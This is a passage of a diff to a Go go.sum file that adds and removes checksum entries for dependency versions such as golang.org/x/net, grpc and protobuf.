h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM= +golang.org/x/net v0.0.0-20210716203947-853a461950ff h1:j2EK/QoxYNBsXI4R7fQkkRUk8y6wnOBI+6hgPdP/6Ds= +golang.org/x/net v0.0.0-20210716203947-853a461950ff/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= +golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527 h1:uYVVQ9WP/Ds2ROhcaGPeIdVq0RIXVLwsHlnvJ+cT1So= golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1 h1:SrN+KX8Art/Sf4HNj6Zcz06G7VEz+7w9tdXTPOZ7+l4= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= -golang.org/x/text v0.3.2 h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs= golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= +golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= +golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= +golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28= +golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= +golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= +golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= google.golang.org/genproto v0.0.0-20200305110556-506484158171/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= -google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0 h1:N5O9PpTbQrkvH0IQ1q+mmGyg8Gt6iKcu6b6+gmz3jnA= google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= +google.golang.org/genproto v0.0.0-20200513103714-09dca8ec2884/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= +google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= +google.golang.org/genproto v0.0.0-20201102152239-715cce707fb0/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= +google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f h1:YORWxaStkWBnWgELOHTmDrqNlFXuVGEbhwbB5iK94bQ= +google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f/go.mod h1:ob2IJxKrgPT52GcgX759i1sleT07tiKowYBGbczaW48= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= -google.golang.org/grpc v1.27.1 h1:zvIju4sqAGvwKspUQOhwnpcqSbzi7/H6QomNNjTL4sk= google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.33.1/go.mod h1:fr5YgcSWrqhRRxogOsw7RzIpsmvOZ6IcH4kBYTpR3n0= +google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= +google.golang.org/grpc v1.36.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= +google.golang.org/grpc v1.39.0/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnDzfrE= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= +google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= +google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= +google.golang.org/protobuf v1.27.1 h1:SnqbnDw1V7RiZcXPx5MEeqPv2s79L9i7BJUlG/+RurQ= +google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.3/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=